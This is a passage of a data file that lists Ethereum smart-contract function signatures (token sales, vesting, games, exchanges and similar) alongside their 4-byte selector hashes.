"totalSupplyOf(uint256)": "0x75b0d9cd", "availableInventoryOf(uint256)": "0x892412f0", "setRenewable(uint256,bool)": "0x3f4f3075", "clearInventory(uint256)": "0x533f6730", "decrementInventory(uint256,uint256)": "0xfe3d07e4", "incrementInventory(uint256,uint256)": "0xe89b5d4b", "createProduct(uint256,uint256,uint256,uint256,uint256)": "0x92363a42", "_requireRenewableProduct(uint256)": "0xabc4558e", "_purchaseOneUnitInStock(uint256)": "0x9ffea547", "_setRenewable(uint256,bool)": "0xb43c39a7", "_setPrice(uint256,uint256)": "0x3405321d", "_clearInventory(uint256)": "0x58c8ca0c", "_decrementInventory(uint256,uint256)": "0x21090b31", "_incrementInventory(uint256,uint256)": "0x53a06609", "_createProduct(uint256,uint256,uint256,uint256,uint256)": "0x8bbdcf67", "_productDoesNotExist(uint256)": "0x512b64c6", "_productExists(uint256)": "0xe9c9262e", "setMaximumRate(uint256)": "0x879125a4", "setBaselineRate(uint256)": "0x8d647185", "whitelist(address,uint256)": "0x98fc55d8", "withdrawFrom(address,address)": "0xe81f02b6", "_performWithdraw(address,address)": "0xaf2f9105", "cutFor(address,uint256,uint256,uint256)": "0xe230e246", "isAffiliateProgram()": "0xcd43ee99", "AffiliateProgram(address)": "0xa747007f", "licenseInfo(uint256)": "0x1e084558", "licenseAffiliate(uint256)": "0x0e9fd199", "licenseExpirationTime(uint256)": "0xdfbebd07", "licenseIssuedTime(uint256)": "0x1411d713", "licenseAttributes(uint256)": "0xf4b272db", "redeemStake(address,address,uint256,uint8,bytes32,bytes32)": "0x8f36f8f1", "registerForGetTogether(address)": "0x2a89d6fd", "stakedAmount(address,address)": "0x2a4a8e02", "totalStaked(address)": "0x9bfd8d61", "trustedCancelOrderTransfer(address,address,uint256)": "0x7b30074d", "trustedFillOrderTransfer(address,address,uint256)": "0x3d3c5c9f", "trustedOrderTransfer(address,address,uint256)": "0x764c92f2", "isShareToken()": "0xab6def1c", "destroyShares(address,uint256)": "0xd333d7cf", "createShares(address,uint256)": "0x0f9e5bbd", "setIsShareToken(bool)": "0xeed45ca8", "setOutcome(uint256)": "0x416e517e", "getDestroySharesFxpValueValue()": "0x6ccd993b", "getDestroySharesOwnerValue()": "0xcc4aa005", "getCreateSharesFxpValue()": "0xe60fd342", "getCreateSharesOwner()": "0x28339175", "getInitializeOutcomeValue()": "0x91a34006", "getInitializeMarketValue()": "0x53a1c51e", "endContract(address,uint256)": "0xcba5b465", "recordTransaction(address,uint256,uint64,uint64,uint64)": "0x8b4d199e", "deactivateHedge(address,uint256)": "0x1d19a78e", "activateHedge(address,uint256)": "0xe557a18e", "getNumberOfTx(uint256)": "0xd8c1c3c2", "getHedgeIndices(address)": "0xe6c1d7fc", "addHedge(address,uint256,uint256,bytes3,bytes3,uint64,bytes32,bytes32)": "0x6f01d915", "CurrencyHedge()": "0xd182b4ff", "delete_key(uint256,uint256)": "0x054ba658", "push_key(uint256,uint256,uint256)": "0xa224a5b3", "place_to_push(uint256,bytes32)": "0x5d3899af", "binary_search(uint256,bytes32)": "0x0d3e4044", "get_number_of_DBs()": "0x2ba5b90d", "get_DB_info(uint256)": "0x792544af", "get_row_col(uint256,uint256,uint256)": "0xe2d6eddc", "get_row(uint256,uint256)": "0x564f9728", "get_header(uint256)": "0x67cb9316", "search(uint256,bytes32)": "0xe0dbbea2", "erase(uint256,uint256)": "0x9392e5b5", "update(uint256,uint256,bytes32[])": "0xb868a2ff", "insert(uint256,bytes32[])": "0x57056261", "create(bytes32,bytes32[])": "0x655059db", "EVMDB()": "0xd2eb6483", "getContract(bytes32)": "0xe16c7d98", "getContractInfo(bytes32)": "0x613e2de2", "updateController(bytes32,address)": "0xeb5dd94f", "setContractInfo(bytes32,address,bytes20)": "0xd737c2b0", "addData(uint256)": "0xe5d824a7", "DataExternalValidation(address)": "0xa0187f91", "create(uint256,bytes)": "0xfd7230d6", "addPresaleTokens(address[],uint256[],uint256)": "0xd77a39c9", "TGEDeployer(uint256,uint256,uint256,uint256,uint256,uint256,address,address)": "0xe6452f64", "ident()": "0x90797634", "batchTransfer(bytes32[])": "0xfa369e66", "fun()": "0x946644cd", "getMarket()": "0xf1be1679", "getMemberAtIndex(address,uint256)": "0x06477332", "getTeamAddress(bytes32)": "0xe526d7a0", "removeTeamMember(address,bytes32)": "0x65dba2b3", "addTeamMember(address,bytes32,address)": "0x8b13d4e0", "addTeam(bytes32,bytes32,address,bytes32)": "0x16e93702", "registerActionEvent(bytes32)": "0x4a6b9473", "getUnavailableTakerTokenAmount(bytes32)": "0x7e9abb50", "getPartialAmount(uint256,uint256,uint256)": "0x98024a8b", "isRoundingError(uint256,uint256,uint256)": "0x14df96ee", "isValidSignature(address,bytes32,uint8,bytes32,bytes32)": "0x8163681e", "getOrderHash(address[5],uint256[6])": "0xcfc4d0ec", "batchCancelOrders(address[5][],uint256[6][],uint256[])": "0xbaa0181d", "fillOrdersUpTo(address[5][],uint256[6][],uint256,bool,uint8[],bytes32[],bytes32[])": "0x363349be", "batchFillOrKillOrders(address[5][],uint256[6][],uint256[],uint8[],bytes32[],bytes32[])": "0x4f150787", "batchFillOrders(address[5][],uint256[6][],uint256[],bool,uint8[],bytes32[],bytes32[])": "0xb7b2c7d6", "fillOrKillOrder(address[5],uint256[6],uint256,uint8,bytes32,bytes32)": "0x741bcc93", "cancelOrder(address[5],uint256[6],uint256)": "0x394c21e7", "fillOrder(address[5],uint256[6],uint256,bool,uint8,bytes32,bytes32)": "0xbc61394a", "RefundableCrowdsaleImpl(uint256,uint256,uint256,address,uint256)": "0x13d40e71", "SITExchanger(address,address,address)": "0x7c1a4ee8", "resumeContribution()": "0xb681f9f6", "pauseContribution()": "0x4b8adcf7", "tokensForSale()": "0x12aef8c3", "tokensIssued()": "0x7c48bbda", "percent(uint256)": "0x7532b4ac", "doBuy(address)": "0xe715920f", "setExchangeRate(uint256)": "0xdb068e0e", "setMinimumInvestment(uint256)": "0x45f826da", "initialize(address,address,uint256,uint256,uint256,uint256,uint256,address,address,address,address,address)": "0x5628fc09", "Contribution()": "0xfb65e4b1", "changeBurner(address)": "0x80b022e8", "Burnable()": "0x36579ff6", "refund(address,uint256)": "0x410085df", "BasicTokenMock(address,uint256)": "0x9cb33309", "refundJobSponsorships(uint256,uint256)": "0xfa0c498e", "addJobSponsorship(uint256,string,string)": "0x01f5af30", "EthlanceSponsor(address)": "0x2d80f13c", "suspend()": "0xe6400bbe", "getType()": "0x15dae03e", "getName()": "0x17d7de7c", "getNameHash()": "0xe102d950", "getAdministrator()": "0x16967407", "setState(uint256)": "0xa9e966b7", "User(string,address)": "0x767f7b01", "transferWithMessage(address,uint256,bytes)": "0x07560f13", "transferWithMessageAndRequestAddress(address,uint256,address,bytes)": "0xd3088b52", "Golem()": "0x40e7261d", "dumpBalance(address)": "0x98cc6754", "setZlotsAddress(address)": "0x3da55aba", "pullTokens(address)": "0x42e9c6ce", "issueCoin(address,uint256)": "0xab77b178", "claimShare(address,address)": "0xaec9a987", "claimShare()": "0x666da64f", "isSplitable()": "0x741b0508", "splitShare()": "0xa5f9fd99", "refund(address[])": "0xe02cec51", "setDaySellAmount(uint256,uint256)": "0x1f6ce1d3", "setLeftICOTokens(uint256)": "0xcafa22d7", "initLeftICOTokens()": "0x6c150f42", "startICO(uint256,uint256)": "0x9c08d549", "StartGuess_tw(string,string)": "0x3cf3ecd7", "_ownerTransfer(address,address,address,uint256)": "0x98110106", "initialTransfers(address[],uint256[])": "0x8755b065", "_initialTransfers(address,address[],uint256[])": "0x05dd071c", "distributeMAGGIE(address[],uint256,uint256)": "0x1774df3e", "Margaret()": "0xf27f974b", "Linfinity()": "0x9198e08c", "wnFromGas(uint256)": "0xd64d136d", "finalize(bytes,bytes,bool)": "0x8580563c", "nextMember()": "0x9a967e3b", "to(address,bytes)": "0xaf0bdb38", "HCPTToken()": "0x415bc701", "IUPToken()": "0x1883d2a4", "CipherPlayToken(address,address)": "0xa2bc2eef", "changeMaster(address)": "0xf4ff78bf", "EZ25COIN()": "0xcd560862", "ICToken()": "0x6ddf09c4", "CNiteToken()": "0x9b727e80", "setSomeValue(string)": "0xd894e937", "SelfDesctructionContract()": "0xca43801a", "Lara(uint256)": "0x51b6914a", "batchTransferValues(address[],uint256[])": "0xa65ac961", "PumpAndDump()": "0x93adf28b", "HTCToken()": "0xe9177f1b", "_isCeo(address)": "0xb688524f", "_transferCeo(address)": "0xfa1ca37e", "_distributeHorse()": "0x273dd51f", "_distribute()": "0x34b3ae71", "_distributeRest()": "0xa65c3097", "donateToProject(uint16)": "0xe0c6046c", "changeAddressPaladin(address)": "0xfbd9c625", "changeAddressKnight(address)": "0xfb5f8a13", "changeAddressJoker(address)": "0xb5483f28", "changeAddressQueen(address)": "0x4cc45f50", "EnChangToken()": "0x4a4a26d7", "KYROInv()": "0x0c939ae1", "setModerator(address)": "0x75bba189", "acceptOwnershipOfVesting(address)": "0x9edfb9ee", "deployTgeTeamVesting(address,uint256)": "0x2f156f69", "deployOtherVesting(address,uint256,uint256)": "0x153677b7", "deployVesting(address,string,uint256,bool,bool,bool,address)": "0xffaa67d4", "salvageNotAllowedTokensSentToContract(address,address,uint256)": "0x27a75474", "releaseMyTokens()": "0x5b0e1a2f", "addVesting(address,address,address,string,uint256)": "0xe927ca04", "storeNewVesting(address,address,address,string,uint256)": "0xe2022d3a", "VestingMasterContract(address,bool)": "0xbf31fc58", "setReleasingSchedule(address)": "0xc93aac88", "TokenVestingContract(address,address,bool,bool,bool,address)": "0x7fb191a5", "TgeTeamReleasingScheduleContract()": "0x26a26f71", "TgeOtherReleasingScheduleContract(uint256,uint256)": "0xc4cc6e53", "ReleasingScheduleLinearContract(uint256,uint256,uint256)": "0xba3f8f31", "getReleasableFunds(address)": "0x3c9719a7", "salvageNotAllowedTokensSentToContract(address,uint256)": "0x215458b0", "modifyairdrop(uint256)": "0xff862839", "SeeSourToken()": "0x9075726e", "BeggarToken()": "0x03e39113", "BithelloToken()": "0x668bd511", "NetareumToken()": "0x6ae8fefa", "ANMOToken()": "0x9b5b094f", "GCA()": "0xb71ce659", "TheInternetDigitalCurrency()": "0xa660698e", "TopPlayerToken()": "0xe1ec12c7", "CBOToken()": "0xda397985", "valueBeforeFeesWereReduced(uint256)": "0x5b714690", "setFeeBps(uint256)": "0x72c27b62", "YTPAY(uint256,string,string)": "0xbd079a18", "TJToken(uint256,string,uint8,string)": "0x279a475f", "KYRO()": "0x04f4f7ab", "MJT()": "0x5cac0176", "rewardMintOwner(address,uint256)": "0x99260144", "RigoBlock()": "0xc1ec10f4", "ACT(uint256,string,string)": "0x90855c31", "withdrawQR(address)": "0x72baa12e", "buyXnameQR(address,bytes32,uint256)": "0xc06b5281", "Start_qui_qz(string,string)": "0x702f9019", "IPM()": "0xd5e9eb9c", "TCPC()": "0x220b4a73", "WbtToken()": "0x9c8bcd6d", "USC(uint256,string,string)": "0xfe47d34f", "availableReward(address)": "0x066fd899", "OxyCoin()": "0xe917f82d", "PASSToken()": "0xd42d4c10", "transferFrom(address,address[],uint256[])": "0x46091499", "isAuthed(address,address)": "0x6e377202", "erc20Address()": "0x276184ae", "updateAuth(address,address,bool)": "0xf7670b0c", "marketCount()": "0xec979082", "WOLF2()": "0x04fd295c", "icoEndOfStageA()": "0x0db9d891", "INVESTOR_LOCK_DURATION()": "0x13f4c7a5", "numBeneficiaries()": "0xcb22d41b", "LATER_AUCTIONS_INITIAL_PERCENTAGE()": "0xd57a9e4f", "tradeExecutor()": "0xa7f07011", "byuoutCount()": "0x4a9bdb65", "numOfDeliveredEarlyPurchases()": "0xa1f8ea3b", "PublicMineCallsCount()": "0x6c70ad0d", "sumElements(uint32[])": "0xd32b607c", "exitFee_()": "0x2b38ee56", "INDToken()": "0x48be4030", "BONUS1_LIMIT()": "0x8dab38da", "activeBalance()": "0x08998c93", "preSaleSupply()": "0x2e055bcc", "proofOfConceptCap()": "0x8ccc04ea", "freezeBlocks()": "0x7c4a0552", "allowedRewardTokens()": "0xa30f786f", "new_bonus_for_next_period()": "0x41867384", "clientmanagerShare()": "0x52b33d64", "issuerReservedMaximumPercentage()": "0x27939ea2", "tvcEthFund()": "0x2cfa606d", "creator_fee()": "0xfe2644c6", "finishGenerating()": "0xa4d67d63", "amountPower()": "0x88331b6f", "publicsale_address()": "0x1a9d64c8", "tokenTeamSupporter()": "0xc40af29f", "daoContract()": "0x4a7ffcbc", "totalPrize()": "0x82b1ad50", "getIcoFund()": "0x85cb469a", "maxRingSize()": "0xcbc12d13", "StartdateICO()": "0x18bdb1b0", "gizerItemsContract()": "0xe0591ddc", "blue()": "0xed18f0a7", "minTransAmount()": "0x4c80b03b", "presaleTokens()": "0x0a09815c", "privateSaleLockEndTime()": "0x74c6bd74", "SHARE_PURCHASERS()": "0x4bed33b8", "airdropped()": "0x19cc02aa", "marketGrapes()": "0xb95a8327", "cookUpFee()": "0xbe9b3282", "getCurrentGameId()": "0xa2635401", "BROKER_RESERVE_SUPPLY()": "0x094b94c7", "getFreeTime()": "0x11737d7b", "tokenPriceInitial()": "0x16963872", "user_acq_address()": "0x828dfbca", "supply_increased()": "0x1b7949e2", "minFinneyPerSaleMoreThan()": "0x14cfb977", "claimedAirdropTokens()": "0x31b7c458", "AGENCY_ADDR()": "0x6103ae75", "stake_reward_rate()": "0x91410c97", "usdDecimals()": "0x66a4b6c0", "initEpochBalance()": "0x50148ed2", "stages()": "0x47d20373", "personalMaxcap()": "0x086677de", "currentGen()": "0xb753485f", "lastBlock_a1()": "0x686caf04", "reservedTokensWallet()": "0x2c138236", "poolAddressCapTier1()": "0x205dc0ee", "sellFloor()": "0xa1dab23e", "thirdStageMinting()": "0xceae7f64", "operater()": "0x71c2835e", "tier1Timestamp()": "0x16b66016", "ddftFundDeposit()": "0xb244c3f3", "remark1()": "0x4105e02f", "rewardsAllocation()": "0x4c0c0ac2", "XTVAirDropped()": "0xb958893e", "PreTgeEnable()": "0xe6a605df", "negligibleRateDiff()": "0x4cef5a5c", "minCap()": "0x3fa615b0", "WALLET_LB_COMMUNITY()": "0xf9d6de48", "totalSellingItem()": "0xd7c39cc6", "tokenCurrentStage()": "0xf40314f4", "getAccumulatedServiceFee()": "0xec9d7fd2", "tokensPreICO()": "0x4d999756", "getSymbolHash()": "0x6ea928d9", "getStagesBeginEnd()": "0x42d2c127", "marketingPartnerSupply()": "0x8e9e8b14", "isProgress()": "0x7ab13ba9", "Airsavecoin()": "0xed21a7e7", "maxBuyTokenAmount()": "0x180c0dfe", "stopTransferToken()": "0xd344e01b", "bankrollBeneficiaryAmount()": "0xccbd5152", "prizeFundHWC()": "0x6c326a46", "sumHardCapICOStage5()": "0x0d3471f9", "operationsPercentOfTotal()": "0xa3fcf9bc", "TEAM_SALE_MULTIPLIER()": "0x19677635", "ifSuccessfulSendFundsTo()": "0x855fe4c0", "deploy_time()": "0xa5d8cdf2", "initialReserve()": "0xe6fd2982", "secondLockTime()": "0x7fcb024a", "lastCallAddress()": "0x45ad35bc", "TEAM_CAN_CLAIM_AFTER()": "0x70c5f786", "timeExtension()": "0x143551e4", "qnt10k()": "0x477bda31", "INITIAL_SUPPLLY()": "0xfe006839", "rntToken()": "0x1db4b07f", "countActiveCastle()": "0xd7ebf53d", "wallet4()": "0x7673faf0", "originalPrice()": "0x76a24f25", "factoryContract()": "0xde11c94a", "landmarkPoolTotal()": "0xde6a1b19", "fee_percentage()": "0xc46ed45a", "returnTokensToWallet()": "0xd017c2b4", "reStartPreIco()": "0x43cade1c", "DST_RESERVE()": "0x47992b25", "card_gold_minamount()": "0x421e52e3", "getEventEnd()": "0xd4884b56", "MESSAGE_PRICE()": "0xfb63c4fc", "bpToken()": "0x23685b97", "jackpotLevel()": "0x658311ab", "numTokenPerEth()": "0x28b4e62a", "stop_token_time()": "0x5f77ace0", "priceLocked()": "0xea2470ab", "withdrawal_last_voter()": "0xd6106696", "startIncomeDistribution()": "0xd8367d41", "SALES_ALLOCATION_PPM()": "0x6d1e2194", "teamClaimed()": "0x2f334652", "hgt()": "0xa4b52ef2", "poi_token()": "0x3ffdabda", "kingsMessage()": "0xaad9afee", "MainSaleDeadline()": "0x7953ae77", "firstsaleOpen()": "0x0198aa74", "MAX_VALUE()": "0x063bde24", "tradingLive()": "0x11704f52", "etherForCharity()": "0xd36f0e9c", "salePrice()": "0xf51f96dd", "createMilestoneAcceptanceProposal()": "0x89f182aa", "withdrawlDeadline()": "0x1f83bcd7", "authoriseNextAction()": "0xdb55bd2d", "repossessionBlocks()": "0x07e0421f", "lastBlock_a5()": "0x65472731", "transferAllDividends()": "0x3deaa297", "twentyEndTime()": "0x13110199", "MAX_CONTRIBUTION()": "0x94d95f8f", "lemonsRemainingToDrop()": "0xac17cba4", "numberOfRecentPlayers()": "0x3bce14c8", "tokenlenth()": "0xec322a88", "returnLastBuyerIndex()": "0x9c1f332f", "signedApproveAndCallSig()": "0x233907a3", "maxTime()": "0x22e67e71", "getE()": "0xb1cb267b", "roundEthShares()": "0xe4ce25ac", "phase_4_token_price()": "0x4ae3643f", "addressICOManager()": "0xac218c6d", "totalPeriods()": "0xfea708f6", "foundationAddress()": "0xfcf07c6b", "dividendPerToken()": "0x77ec0feb", "ethRate1()": "0xc26d0412", "marketTotalEarning()": "0x8646b5cb", "hasBeenClaimed()": "0xfc792719", "minter1()": "0x7e76b836", "congratulationsText()": "0x114e4802", "SIGMA_FTL_SPEED()": "0x816d199c", "iICO()": "0x3816d4ee", "_nowDateTime()": "0x9220d426", "remainingAuctionable()": "0xc6e81b07", "PRESALE_ADDRESS()": "0xf015bc93", "PRE_COIN_PER_ETHER_ICO()": "0x5c67ae76", "Bankroll()": "0xd0bcfc0c", "DECIMALSFACTOR()": "0x8bc04eb7", "dripAmount()": "0x35a1529b", "pot_()": "0x4b1cff0b", "goldBought()": "0x92e0ba2a", "LEGAL_EXPENSES_TOKENS()": "0x2f3085d6", "window1StartTime()": "0xbfffe670", "enjinTeamAllocation()": "0x6a06bf92", "PER_ACCOUNT_ADDITIONAL_TOKENS()": "0xde02f1fc", "privateSaleDate()": "0xf59ed863", "DEFAULT_MAX_LOCK_DURATION()": "0x282c3c47", "totalGuaranteedCollected()": "0x137935d5", "ubiatarPlayWallet()": "0x14fcb95c", "firstVestAmount()": "0xd15334a5", "period4End()": "0x083d9e6d", "allowedAmountTransferedToPoolTotal()": "0x6142e78f", "initialTIPsupply()": "0x81516c7b", "winnersCount()": "0x49713811", "hodlerTotalValue6M()": "0x0eb6f543", "minPot()": "0xb6674935", "slowDump()": "0xc976b4f9", "customer()": "0x2804b2c0", "latestRound()": "0x668a0f02", "getRedeemedList()": "0x023fadda", "dateRelease6()": "0xb2ee95f9", "tokensInWeiSold()": "0xff4dddc4", "allTimeJackpot()": "0x47ddf87e", "maxPeriodDuration()": "0xd9178993", "tokenPriceForPreICO()": "0x563bd001", "creditsExchanged()": "0xe0ec289a", "VILLAGE_INCREASE_RATE()": "0x9f04873d", "flips()": "0xcb78c9f0", "fastCashBank()": "0x21d269dc", "ROUND_4_PRESALE_BONUS()": "0xb4cfd972", "tokenDistribution()": "0x08a6077c", "keyRequired()": "0x42d01878", "getParentAddress()": "0x91fa0555", "ETCL()": "0xe06fa13d", "perSaleWithDrawal()": "0x90dd9d17", "share1()": "0xd6a527eb", "ThanosXToken(uint256,string,uint8,string)": "0x0a04dde8", "Tbaol()": "0x216ecfa7", "GoldTokenERC20()": "0x007b2a03", "Erc20SupplyToken(uint256,string,uint8,string)": "0xaf2b114a", "PingToken()": "0xe682e2b2", "SetCommissionValue(uint256)": "0xfc880be0", "SophosToken()": "0x51b95400", "SoraToken()": "0xe96cd01c", "Variant()": "0xbef2e0d8", "mintSub(address,uint256)": "0x978ca331", "shittyRandom()": "0x0fbb3b6b", "countFortunes()": "0xc3dfb938", "drawFortune()": "0x8e3d7ae7", "addFortune(string)": "0x4cf373e6", "Fortune(string)": "0xeccd162e", "My2Token()": "0xad9e3e85", "Briant2Token()": "0x17d60394", "getCompte_4()": "0xe52efbf1", "setCompte_4(string)": "0x4d6c3b6b", "getCompte_3()": "0x2a095c14", "setCompte_3(string)": "0x2fc17f8b", "getCompte_2()": "0xeef017f1", "setCompte_2(string)": "0xb19d4916", "getCompte_1()": "0x650669d2", "setCompte_1(string)": "0x62c9da62", "Annexe_CPS_6()": "0xe180e23b", "Grand_Solar_Minimum()": "0xd2d153a4", "setTransferBlocked(bool)": "0xe31743d7", "Bam()": "0xa35ae3ab", "Foorp()": "0xcb24e8f1", "HashToken(address)": "0xfd70b40d", "sendInitialTokens(address)": "0x142f53c2", "send(address[],uint256[])": "0xa645ff5f", "NSCDistributionContract()": "0x61ba89d4", "getNoOfSoldToken()": "0x8c31d67e", "getExchangeRate()": "0xe6aa216c", "getContractTimestamp()": "0x19dd9455", "currentBonus()": "0xeca73f64", "NOLLYCOINCrowdFund()": "0x44fc2a9b", "NOLLYCOIN(address)": "0xbeddf557", "ElectronicMusic()": "0xb5ba95a0", "DoDividend(uint256,uint256,uint256)": "0xf3106780", "ChangeItemOwnerID(uint256,uint256)": "0x898ce10c", "AddItem(string,uint256,uint256)": "0x07da14ce", "CheckItemExists(uint256)": "0x7f4d5150", "IntelliShareEco()": "0x0fd6fc49", "bulkTransfer(address[],uint256[],address)": "0x89ef8292", "myetherpay(uint256,string,string)": "0x5ed50033", "DATAToken()": "0x37a0b958", "changeDepositAddress(address)": "0x6d58c88f", "sendBoughtTokens(address,uint256)": "0xf3cd543f", "setAuthorizedContract(string,address,bool)": "0xe0ae751f", "updateContract(string,address)": "0x697a60b3", "removeContract(string)": "0x97623b58", "getContract(string)": "0x35817773", "addContract(string,address,address)": "0xc5592be2", "authorize(string,address)": "0x86457702", "MakeERC20(uint256,uint256,string,string)": "0x60702417", "GiveERC20()": "0x9ec7486a", "del()": "0xb6588ffd", "change(string,string,uint256,uint256,bool)": "0x06c89667", "ERCSpammer(uint256,uint256,string,string)": "0xccc9735d", "withdrawDragons()": "0x9c0bd57c", "transferBeneficiary(address)": "0x14bbe21c", "DragonCrowdsale()": "0x5da54cee", "ItlyCoin()": "0x17c73612", "TOTALSUPPLY()": "0x94a08c69", "EOS()": "0xb6834572", "GVPE_Token()": "0xaba133ea", "VPE_Token()": "0x5af86018", "BGB_Token()": "0x5ab3fbc9", "CNT_Token()": "0x9f5ce849", "refreeze()": "0xe988998a", "rename(string)": "0x66605ba4", "balanceOfMine()": "0x1459cef4", "desapprove(address)": "0x3d3eb22a", "Token(uint8,uint256,string,string)": "0x38906dbd", "newParameterizerWithToken(uint256,string,uint8,string,uint256[])": "0x1f4d7ec4", "claimRewards(uint256[],uint256[])": "0x5f02116f", "init(address,address,uint256[])": "0x44b77680", "EventChain()": "0xc9fa11df", "LVXToken()": "0xdb91095e", "winPrize()": "0xb11cc099", "checkSecret()": "0x2fdfd2ae", "guessSeed(uint256)": "0xbced9cfd", "addSeed(uint256)": "0xf6fc8160", "setSeed(uint256,uint256)": "0x1d7915ad", "callSecondTarget()": "0x1d263b53", "callFirstTarget()": "0x066d4701", "unlockSecret()": "0xf285d98e", "manipulateSecret()": "0x59eca3e2", "becomePlayer()": "0x56075a98", "getPrize()": "0xc34f6b0d", "getPlayerCount()": "0xc2e52206", "setSecret(uint256)": "0x3b4dbf8b", "DranMe()": "0x2a8de0ca", "RrcToken()": "0x8d2c8ce8", "TJCoin()": "0x70713209", "TERATO()": "0x3902cb92", "checkPrice()": "0x8fc3047d", "distAirdrop(address,uint256)": "0x21c26195", "getUserBlockNumber(bytes32)": "0x6f51d01f", "isLowercase(bytes32)": "0x569a7aab", "repost(uint256)": "0x0ea37c64", "reply(bytes32,uint256)": "0xe96da99e", "post(bytes32)": "0xa74a1831", "updateUserDetails(bytes32)": "0x3ff0ab0b", "Leeroy(address)": "0x7a783d91", "create(uint256,address)": "0xf01fe692", "disableController(address)": "0xf4fc3570", "enableController(address)": "0x0b6e46fe", "LeeroyPoints()": "0x3a190e60", "safeAddCheck(uint256,uint256)": "0xe42d70ba", "mintTokens(address[],uint256[])": "0xc2acc5cf", "BITHALALToken()": "0x542de573", "QuantumPay()": "0x541e34a7", "SvelteyCoin(uint256,string,uint8,string)": "0xee40d7c6", "YOYOW(address)": "0x874ff7ed", "enableShowValue(bool)": "0xd5b42496", "CSPTToken()": "0x52558c2b", "ADSToken()": "0xd92d5bb3", "claimDay(uint256)": "0x1248b101", "setAccountNickname(string)": "0x4d9994e8", "getPriceByDayIndex(uint256)": "0x669ef86d", "calculatePriceIncrease(uint256)": "0xebd8fde3", "calculateOwnerCut(uint256)": "0x205f3b58", "isMintingFinished()": "0x1a582962", "assignInitialDays(address,uint256,uint256)": "0x14d30335", "createInitialDays(uint256)": "0x2ac20ed4", "EOSCToken()": "0x5bff1aa8", "Digiblock()": "0x56cd26eb", "ChessClubLiveChessCoin()": "0xbdace3de", "getActionIds(bool,bool,bool)": "0xe33c9755", "getActionCount(bool,bool,bool)": "0xf1e9951f", "executeAction(uint256)": "0xc0c1cf55", "confirmAction(uint256)": "0xa63d914f", "deleteAction(uint256)": "0xdf7dfef7", "changeQuorum(uint256)": "0xd2cd96bd", "withdrawOwner(address)": "0x3f0cea3f", "MultiSigTokenWallet(address[],uint256)": "0x2c96bee2", "revokeSelf()": "0x21ef10f0", "revokeAllVulnerable()": "0x7c937700", "inactivateSelf()": "0x47bba01d", "proclaimAllInactive()": "0xe4f896e8", "revokeAndSetNewMember(uint8,bytes32,address)": "0x91b25b35", "setMembershipStatus()": "0xb43959c0", "theCyberMemberUtilities()": "0x1028e4a8", "DaleoneToken()": "0x8d498158", "setDistributionAddress(address)": "0xb89fc89e", "burnSent(uint256)": "0x879f30ad", "GalaxiumCoin()": "0xdc22aca5", "PresiamDrop()": "0x6bd3a1c3", "DdosToken()": "0xb25310b0", "checkGoals()": "0xe2d17ab1", "getDiscountOf(uint256)": "0xc118a9de", "initDiscounts(uint256[],uint256[])": "0x53afda90", "successed()": "0xa19b5493", "ceilTokens(uint256)": "0x285da5a9", "foreignPurchase(address,uint256)": "0x5908984b", "sendAdvisorsTokens()": "0x99b6f5a1", "sendDevTokens()": "0xc306cb90", "emergencyUnpause()": "0x4a4e3bd5", "ico(uint256,uint256,uint256,uint256,uint256[],uint256[])": "0x2bd579fc", "preIco(uint256,uint256,uint256,uint256[],uint256[])": "0x2005db6d", "GenericCrowdsale(address,address,address)": "0x08e9f758", "MyDFSToken()": "0x59764714", "OliveGardensResort()": "0x24429e34", "removeWhitelistedAddr(address)": "0x7e01c088", "addWhitelistedAddr(address)": "0x2c88fad9", "RenderTokenCrowdsale(uint256,uint256,uint256,uint256,address,address,address)": "0x7cdcdf23", "destroyAllTokens()": "0x5d6b2f26", "destroyTokens(address,address,uint256)": "0xd6c54bf7", "IsReleaseToken()": "0xde3b653a", "IsAirdrop()": "0x80690e01", "blacklist(address)": "0xf9f92be4", "changeExchangeRate(uint256)": "0x215fce93", "tokenMint(address,uint256)": "0xeef892aa", "unlockOwnerBalance()": "0x25e023b3", "lockedBalance()": "0x7b80889b", "lockOwnerBalance(uint256,uint256)": "0x25f9f1e6", "lockAfterMinting(uint256,uint256)": "0xf0611c44", "coinMinter(uint256,uint256)": "0x64fb7d68", "StatusSecurity()": "0x3ae9de9b", "freezeMintingFor(uint256)": "0x72bff5ad", "Token(string,string,uint256)": "0x281e399c", "ownable()": "0xb38854be", "TaxiToken()": "0xcd5d950f", "SingularDTVToken(address,address,string,string,uint256)": "0xc511b016", "softWithdrawRewardFor(address)": "0xb1622818", "_createPiranha(string,address,uint256,uint8,uint256,uint8,uint8)": "0xae4b76fe", "changeBiteCost(uint256)": "0x16ce8c98", "changeBeedingCost(uint256)": "0x930bbbed", "createPiranhaToken(string,address,uint256,uint8,uint8)": "0x46435fa1", "getActualRate()": "0x32c1eb82", "saleActive(uint256)": "0x04ca2775", "_tokenPurchase()": "0xf607e88a", "SOSRcoinToken()": "0x617ac9a1", "HashCoin(uint256,string,string)": "0x0b6f2fad", "POCY()": "0x29b65a2e", "getSummary()": "0x4051ddac", "presalesTokenPriceInWei()": "0x5e571440", "rateRatioCVSThreshold()": "0xdf565ca2", "changePlatformFlag()": "0x110b8a6d", "ICO_BONUS_TIME_2()": "0xe92340b5", "AMBASSADOR_THREE()": "0xe01dd67b", "_decimals18()": "0x894875cf", "PLAT()": "0x2cf0d6ca", "BASE_MIN_CONTRIBUTION()": "0x04892c9f", "floatHolder()": "0x43a47345", "lastTimestamp()": "0x19d8ac61", "SECONDS_PER_DAY()": "0x74f0314f", "weiRaisedAfterDiscounts()": "0x9fc880f4", "totalBountyAmount()": "0xde72b83d", "founderAddress()": "0x46bb2833", "oldCirculatingSupply()": "0x8c727fa3", "isOnSale()": "0x890e839f", "received_wei()": "0x7b10e717", "INITIAL_STARTTIME()": "0x677ab667", "pendingManager()": "0xa00fff6f", "MAX_TOKENS()": "0xf47c84c5", "endICOp2()": "0x77caa7e6", "largeRate()": "0xfd2dba2f", "fundingLowcapReached()": "0xab2c8b16", "claimerKey()": "0x4c1bbef8", "RoundToken()": "0xf5b85ad8", "rewardPercentage()": "0x52d472eb", "numOfMiningTimes()": "0xd9d14d37", "mntpToMigrateTotal()": "0x8f01932a", "finneyPerToken()": "0x96d4ebf1", "minFinneyToKeep()": "0x864757a8", "pearlContract()": "0x71c6d4dc", "REQUEST_REJECTED_BY_HOST()": "0xe66d9874", "refundPoweredUp()": "0xcec36cb4", "mainSale_StartDate()": "0xb8788453", "_auth_mode()": "0xd551f601", "teamCliff()": "0x3879c9f3", "WHITELIST_PERIOD()": "0x0ec4fb0a", "firstExchangeRate()": "0x6b0f02e6", "totalPurchased()": "0xe632c2f3", "rngId()": "0xdb7057fb", 